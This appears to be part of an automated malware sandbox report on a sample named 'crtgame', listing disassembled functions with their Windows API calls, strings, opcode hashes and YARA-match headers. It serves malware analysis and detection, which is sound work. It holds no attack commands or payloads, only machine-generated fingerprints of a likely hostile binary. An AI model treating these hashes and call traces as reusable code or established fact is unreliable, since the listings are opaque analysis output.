                                                                                    • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
                                                                                    • String ID:
                                                                                    • API String ID: 725951905-0
                                                                                    • Opcode ID: ba6a0740a0881a760ee1af1ee5bf316acc16a38a43964693c1af82fc78f1cf63
                                                                                    • Instruction ID: 6e07756070e4b26d4ecdf3fe9cfaf03772223b735b3480a71aedfd0dd608a858
                                                                                    • Opcode Fuzzy Hash: ba6a0740a0881a760ee1af1ee5bf316acc16a38a43964693c1af82fc78f1cf63
                                                                                    • Instruction Fuzzy Hash: 4F0259B1D0025DEEDF25DBE4C844BEEBBB9AF08304F20455AE505B7280DB745A89DFA1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C43428
                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C4346B
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C43472
                                                                                    • GetLastError.KERNEL32 ref: 02C43486
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C434D7
                                                                                    • RtlEnterCriticalSection.NTDLL(00000018), ref: 02C434ED
                                                                                    • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C43518
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                    • String ID: CancelIoEx$KERNEL32
                                                                                    • API String ID: 2902213904-434325024
                                                                                    • Opcode ID: d43ef56560341437cf3c1eb8337ba4e76dcc7d905920a2cd00f7bb55ced84e94
                                                                                    • Instruction ID: 22d21cd0e7faaee70a6dda38440c375ed5a40365c84bb848910d9feaf5c009e2
                                                                                    • Opcode Fuzzy Hash: d43ef56560341437cf3c1eb8337ba4e76dcc7d905920a2cd00f7bb55ced84e94
                                                                                    • Instruction Fuzzy Hash: 2F318FB1900255DFDB11DF65C8887AABBF9FF89315F1049A9E805DB241DB70D901CFA1
                                                                                    APIs
                                                                                    • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C510B0
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C510C5
                                                                                    • ResetEvent.KERNEL32(00000000), ref: 02C510CF
                                                                                    • CloseHandle.KERNEL32(00000000,F0F7CB0E), ref: 02C51104
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,F0F7CB0E), ref: 02C5117A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C5118F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEventHandle$CreateOpenReset
                                                                                    • String ID:
                                                                                    • API String ID: 1285874450-0
                                                                                    • Opcode ID: 06d174526d77b68f202dfe69e1207438171c67670058a5f905916858d7800bc4
                                                                                    • Instruction ID: 6369f959397b99aef915c5324c6022b9a22dd7e7b4e5920357598090dce31699
                                                                                    • Opcode Fuzzy Hash: 06d174526d77b68f202dfe69e1207438171c67670058a5f905916858d7800bc4
                                                                                    • Instruction Fuzzy Hash: 14415070D04358ABDF20CFA5CC48BAEBBB8EF45724F184659E819EB280D7709A45CB95
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C420AC
                                                                                    • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C420CD
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C420D8
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 02C4213E
                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C4217A
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 02C42187
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C421A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                    • String ID:
                                                                                    • API String ID: 1171374749-0
                                                                                    • Opcode ID: 5426a38718d1c250f367571a53696cce9ae078c2ec36955eaae5528b27265da2
                                                                                    • Instruction ID: d67a20039bc70efffd450e818ea959f99dbf48183db6e79d7107cce4ad598e76
                                                                                    • Opcode Fuzzy Hash: 5426a38718d1c250f367571a53696cce9ae078c2ec36955eaae5528b27265da2
                                                                                    • Instruction Fuzzy Hash: 204129715047019FC321DF26D889A6BBBF9FFC8654F004A1EF89682650DB30E909CFA2
                                                                                    APIs
                                                                                      • Part of subcall function 02C518D0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C5112E,?,?), ref: 02C518FF
                                                                                      • Part of subcall function 02C518D0: CloseHandle.KERNEL32(00000000,?,?,02C5112E,?,?), ref: 02C51914
                                                                                      • Part of subcall function 02C518D0: SetEvent.KERNEL32(00000000,02C5112E,?,?), ref: 02C51927
                                                                                    • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C510B0
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C510C5
                                                                                    • ResetEvent.KERNEL32(00000000), ref: 02C510CF
                                                                                    • CloseHandle.KERNEL32(00000000,F0F7CB0E), ref: 02C51104
                                                                                    • __CxxThrowException@8.LIBCMT ref: 02C51135
                                                                                      • Part of subcall function 02C53F5A: RaiseException.KERNEL32(?,?,?,02C70F6C,?,00000400,?,?,?,02C5359C,?,02C70F6C,00000000,00000001), ref: 02C53FAF
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,F0F7CB0E), ref: 02C5117A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C5118F
                                                                                      • Part of subcall function 02C51610: GetCurrentProcessId.KERNEL32(?), ref: 02C51669
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,F0F7CB0E), ref: 02C5119F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                    • String ID:
                                                                                    • API String ID: 2227236058-0
                                                                                    • Opcode ID: b60bd1ae136dfcb6780638078edfe95fb53767b72c88b08a4a6fe681d353318f
                                                                                    • Instruction ID: 735d6af51d2757c1d710b2686a78cbe6d4aa40289a5c77431939e4463bd481e7
                                                                                    • Opcode Fuzzy Hash: b60bd1ae136dfcb6780638078edfe95fb53767b72c88b08a4a6fe681d353318f
                                                                                    • Instruction Fuzzy Hash: 40317371D003689BDF20DBA5CC4CBAEB7B9AF85314F180255EC1DE7280D7A1DA85CB95
                                                                                    APIs
                                                                                    • __init_pointers.LIBCMT ref: 02C55794
                                                                                      • Part of subcall function 02C57F02: RtlEncodePointer.NTDLL(00000000), ref: 02C57F05
                                                                                      • Part of subcall function 02C57F02: __initp_misc_winsig.LIBCMT ref: 02C57F20
                                                                                      • Part of subcall function 02C57F02: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02C58C81
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C58C95
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C58CA8
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C58CBB
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C58CCE
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C58CE1
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C58CF4
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C58D07
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C58D1A
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C58D2D
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C58D40
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C58D53
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C58D66
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C58D79
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C58D8C
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C58D9F
                                                                                    • __mtinitlocks.LIBCMT ref: 02C55799
                                                                                    • __mtterm.LIBCMT ref: 02C557A2
                                                                                      • Part of subcall function 02C5580A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C5833A
                                                                                      • Part of subcall function 02C5580A: RtlDeleteCriticalSection.NTDLL(02C73978), ref: 02C58363
                                                                                    • __calloc_crt.LIBCMT ref: 02C557C7
                                                                                    • __initptd.LIBCMT ref: 02C557E9
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C557F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                                    • String ID:
                                                                                    • API String ID: 1500305132-0
                                                                                    • Opcode ID: fcc9146c7c407a8e3be93099f53b9197b36befa8a7f4544bff441368c0152aa0
                                                                                    • Instruction ID: 3e7b39a7a24302d94db426161fe36ec5bd977e2d2b76bd89ce1e7c7d93625f8d
                                                                                    • Opcode Fuzzy Hash: fcc9146c7c407a8e3be93099f53b9197b36befa8a7f4544bff441368c0152aa0
                                                                                    • Instruction Fuzzy Hash: E1F0F0326996315EE6347AB5BC0564A268AEF017B4F600B29EC51C50D4FF11E0C12A6C
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02C52E73,00000000), ref: 02C52EDB
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C52EE2
                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 02C52EEE
                                                                                    • RtlDecodePointer.NTDLL(00000001), ref: 02C52F0B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                    • String ID: RoInitialize$combase.dll
                                                                                    • API String ID: 3489934621-340411864
                                                                                    • Opcode ID: ffb8e782aa754673d168930d21761c40606316e06ad4f26707ce9c239ce38245
                                                                                    • Instruction ID: 5a16f30b6617a8762f6d4556e5ce024dccf21d480c4d8b7fd67f02610bb7a405
                                                                                    • Opcode Fuzzy Hash: ffb8e782aa754673d168930d21761c40606316e06ad4f26707ce9c239ce38245
                                                                                    • Instruction Fuzzy Hash: 54E0E570ED0250ABEB105F71EC4DB1477ADA74070AF604F25F806D1081DBB941AC8F69
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C52EB0), ref: 02C52FB0
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C52FB7
                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 02C52FC2
                                                                                    • RtlDecodePointer.NTDLL(02C52EB0), ref: 02C52FDD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                    • API String ID: 3489934621-2819208100
                                                                                    • Opcode ID: 298ef044d447d6685d7a4611aacfab12bf1e81dfc3e54c8a41bfa4fe882f246a
                                                                                    • Instruction ID: deb9e79b89d17e44744325aa2c6627cc98bb059a9bc4011092d319120792b562
                                                                                    • Opcode Fuzzy Hash: 298ef044d447d6685d7a4611aacfab12bf1e81dfc3e54c8a41bfa4fe882f246a
                                                                                    • Instruction Fuzzy Hash: 81E0B670DC4714ABFB505F61AD0DB247AADF744709F604F25F906D1094DBB9806CCB99
                                                                                    APIs
                                                                                    • TlsGetValue.KERNEL32(00000025,F0F7CB0E,?,?,?,?,00000000,02C664B8,000000FF,02C51BCA), ref: 02C5196A
                                                                                    • TlsSetValue.KERNEL32(00000025,02C51BCA,?,?,00000000), ref: 02C519D7
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C51A01
                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C51A04
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HeapValue$FreeProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1812714009-0
                                                                                    • Opcode ID: dd40c60c1338066e1bd8837952fa118898621e373bb5b478163ea0697b1abc33
                                                                                    • Instruction ID: 8864d561da6152a6f8a2baaada2788f06f1c0c6bdb65e385555e20654a9ec74d
                                                                                    • Opcode Fuzzy Hash: dd40c60c1338066e1bd8837952fa118898621e373bb5b478163ea0697b1abc33
                                                                                    • Instruction Fuzzy Hash: 3851BF319443649FD721DF2AC44CB16BBE4EB85668F0D8A58F85D97280C7B0E984CBA5
                                                                                    APIs
                                                                                    • _ValidateScopeTableHandlers.LIBCMT ref: 02C65190
                                                                                    • __FindPESection.LIBCMT ref: 02C651AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FindHandlersScopeSectionTableValidate
                                                                                    • String ID:
                                                                                    • API String ID: 876702719-0
                                                                                    • Opcode ID: 11fac636d73f15dec92009b2000b2ebf3339b171d219ee1cdda285297120a4d3
                                                                                    • Instruction ID: 2aed5664febf40e46a479a4a6080771327111c9c4e2f4c4d0155301ca2c81d55
                                                                                    • Opcode Fuzzy Hash: 11fac636d73f15dec92009b2000b2ebf3339b171d219ee1cdda285297120a4d3
                                                                                    • Instruction Fuzzy Hash: 22A1CD71A006198FCB24CF58D8C8BBDB7A5FB84794FA84669D805EB380E771E945CB90
                                                                                    APIs
                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C41CB1
                                                                                    • CloseHandle.KERNEL32(?), ref: 02C41CBA
                                                                                    • InterlockedExchangeAdd.KERNEL32(02C774EC,00000000), ref: 02C41CC6
                                                                                    • TerminateThread.KERNEL32(?,00000000), ref: 02C41CD4
                                                                                    • QueueUserAPC.KERNEL32(02C41E7C,?,00000000), ref: 02C41CE1
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C41CEC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                    • String ID:
                                                                                    • API String ID: 1946104331-0
                                                                                    • Opcode ID: 902f89e3bb6892752834727ae116c973f87fd83b9c64019e518642a3bae8dcc4
                                                                                    • Instruction ID: 945ecd39d01abb5e9f94033f3a5dd17269457301c6ec15668f172782492abdef
                                                                                    • Opcode Fuzzy Hash: 902f89e3bb6892752834727ae116c973f87fd83b9c64019e518642a3bae8dcc4
                                                                                    • Instruction Fuzzy Hash: 89F0A435940214BFDB204B97DD0DD57FFBCEB857207004B59F56A82190DBB05954CBB0
                                                                                    APIs
                                                                                    • std::exception::exception.LIBCMT ref: 02C5137F
                                                                                      • Part of subcall function 02C51ED3: std::exception::_Copy_str.LIBCMT ref: 02C51EEC
                                                                                      • Part of subcall function 02C50750: __CxxThrowException@8.LIBCMT ref: 02C507AE
                                                                                    • std::exception::exception.LIBCMT ref: 02C513DE
                                                                                    Strings
                                                                                    • boost unique_lock owns already the mutex, xrefs: 02C513CD
                                                                                    • $, xrefs: 02C513E3
                                                                                    • boost unique_lock has no mutex, xrefs: 02C5136E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                    • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                    • API String ID: 2140441600-46888669
                                                                                    • Opcode ID: e0f86af192dec885d6ff793e661f42c67c531e256f38fc1a62c65d319172e4e0
                                                                                    • Instruction ID: 3420e5d22b2042ccf2ad89bbd00148f656d6745ceb60dfcd642d47fb76e397da
                                                                                    • Opcode Fuzzy Hash: e0f86af192dec885d6ff793e661f42c67c531e256f38fc1a62c65d319172e4e0
                                                                                    • Instruction Fuzzy Hash: 042106B15083909FD720DF24C54875BBBE9BB88B08F444E5DF8A587280D7B9D848DF96
                                                                                    APIs
                                                                                    • __getptd_noexit.LIBCMT ref: 02C54480
                                                                                      • Part of subcall function 02C55672: GetLastError.KERNEL32(?,02C53569,02C55860,02C52A33,00000400,?,02C53569,02C4F37C,?,?,02C4F37C,00000000), ref: 02C55674
                                                                                      • Part of subcall function 02C55672: __calloc_crt.LIBCMT ref: 02C55695
                                                                                      • Part of subcall function 02C55672: __initptd.LIBCMT ref: 02C556B7
                                                                                      • Part of subcall function 02C55672: GetCurrentThreadId.KERNEL32 ref: 02C556BE
                                                                                      • Part of subcall function 02C55672: SetLastError.KERNEL32(00000000,02C53569,02C4F37C,?,?,02C4F37C,00000000), ref: 02C556D6
                                                                                    • __calloc_crt.LIBCMT ref: 02C544A3
                                                                                    • __get_sys_err_msg.LIBCMT ref: 02C544C1
                                                                                    • __invoke_watson.LIBCMT ref: 02C544DE
                                                                                    Strings
                                                                                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02C5448B, 02C544B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                    • API String ID: 109275364-798102604
                                                                                    • Opcode ID: 3a9ccf1a902fd957dab5bd1e4d9a4cb90519659d7163cbdcd7700e624601f4df
                                                                                    • Instruction ID: b7b5710703940feaaeead67b96d43a9e4a05b73979c817c556a4e0442a078fa7
                                                                                    • Opcode Fuzzy Hash: 3a9ccf1a902fd957dab5bd1e4d9a4cb90519659d7163cbdcd7700e624601f4df
                                                                                    • Instruction Fuzzy Hash: 58F059729C0B346BEF39AD264C40A3B72CDEB807A0B008526FD45D7600EB25CDC0169D
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C42350
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C42360
                                                                                    • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C42370
                                                                                    • GetLastError.KERNEL32 ref: 02C4237A
                                                                                      • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                    • String ID: pqcs
                                                                                    • API String ID: 1619523792-2559862021
                                                                                    • Opcode ID: f6287969760ae2f7d94c4681b1d8a5ba3c323d4f478e2a357bfb4054ad6eb466
                                                                                    • Instruction ID: 087cbc7f226a3e44a2bd75b1d448156dd70da45f3dbb79be8d6282a586ce223c
                                                                                    • Opcode Fuzzy Hash: f6287969760ae2f7d94c4681b1d8a5ba3c323d4f478e2a357bfb4054ad6eb466
                                                                                    • Instruction Fuzzy Hash: 67F03670A403046FD7206F75990DB6B77BCDB45605B000955F949D2140EB71D6549BE1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C44035
                                                                                    • GetProcessHeap.KERNEL32(00000000,02C4A5C3,?,?,?,?,?,02C4A5C3), ref: 02C44042
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C44049
                                                                                    • std::exception::exception.LIBCMT ref: 02C44063
                                                                                      • Part of subcall function 02C4A053: __EH_prolog.LIBCMT ref: 02C4A058
                                                                                      • Part of subcall function 02C4A053: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C4A067
                                                                                      • Part of subcall function 02C4A053: __CxxThrowException@8.LIBCMT ref: 02C4A086
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                    • String ID: bad allocation
                                                                                    • API String ID: 3112922283-2104205924
                                                                                    • Opcode ID: d3f287711efd63448bba06031e406a443d7b4662d24fd993b5a155aaf07727cf
                                                                                    • Instruction ID: 639758b295ed16d96812443436477ac426dde357e909ba4efaa2652cf0d71739
                                                                                    • Opcode Fuzzy Hash: d3f287711efd63448bba06031e406a443d7b4662d24fd993b5a155aaf07727cf
                                                                                    • Instruction Fuzzy Hash: 87F082B1E44209AFDB10EFE0D85CBFFBB78EB04344F404955E915A2240DB755218CF91
                                                                                    APIs
                                                                                      • Part of subcall function 02C51450: CloseHandle.KERNEL32(00000000,F0F7CB0E), ref: 02C514A1
                                                                                      • Part of subcall function 02C51450: WaitForSingleObject.KERNEL32(?,000000FF,F0F7CB0E,?,?,?,?,F0F7CB0E,02C51423,F0F7CB0E), ref: 02C514B8
                                                                                    • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C5171E
                                                                                    • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C5173E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C51777
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C517CB
                                                                                    • SetEvent.KERNEL32(?), ref: 02C517D2
                                                                                      • Part of subcall function 02C4418C: CloseHandle.KERNEL32(00000000,?,02C51705), ref: 02C441B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 4166353394-0
                                                                                    • Opcode ID: 09f7b643692f73a710f09a0c51e986347eef62250b6a408143c6d3a8a813d1c9
                                                                                    • Instruction ID: 024ea7938768160ac9d591905fb1eac6b42c39cd01033c22b0cdca6ca1f5b253
                                                                                    • Opcode Fuzzy Hash: 09f7b643692f73a710f09a0c51e986347eef62250b6a408143c6d3a8a813d1c9
                                                                                    • Instruction Fuzzy Hash: FB4127305003258FDB259F2ECC8872777E8EF85764F180668EC1CDB285D774D9858B99
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C420AC
                                                                                    • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C420CD
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C420D8
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 02C4213E
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C421A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                    • String ID:
                                                                                    • API String ID: 1611172436-0
                                                                                    • Opcode ID: 7bce803a3bab192aa64826a57065701b864f461c952634aaa7f98c11d1c5d51f
                                                                                    • Instruction ID: a2f55591fdc42f6613516b124d5814fc1c22f69b9b706c9d069da7ade8e62308
                                                                                    • Opcode Fuzzy Hash: 7bce803a3bab192aa64826a57065701b864f461c952634aaa7f98c11d1c5d51f
                                                                                    • Instruction Fuzzy Hash: 9B315C715047019FC311DF26D885A6BFBF9EFD8664F140A1EF89693650DB30E905CBA2
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4DA89
                                                                                      • Part of subcall function 02C41A01: TlsGetValue.KERNEL32 ref: 02C41A0A
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C4DB08
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C4DB24
                                                                                    • InterlockedIncrement.KERNEL32(02C75170), ref: 02C4DB49
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C4DB5E
                                                                                      • Part of subcall function 02C427F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C4284E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                    • String ID:
                                                                                    • API String ID: 1578506061-0
                                                                                    • Opcode ID: ff7d70058fa1fcff56b2e83837803ec52fd6f4f4188284958445260b8c6a54db
                                                                                    • Instruction ID: 8a124df5aef72d1390aa8f9da2b43c5e60f0123a322f132b854a24d8c99e0720
                                                                                    • Opcode Fuzzy Hash: ff7d70058fa1fcff56b2e83837803ec52fd6f4f4188284958445260b8c6a54db
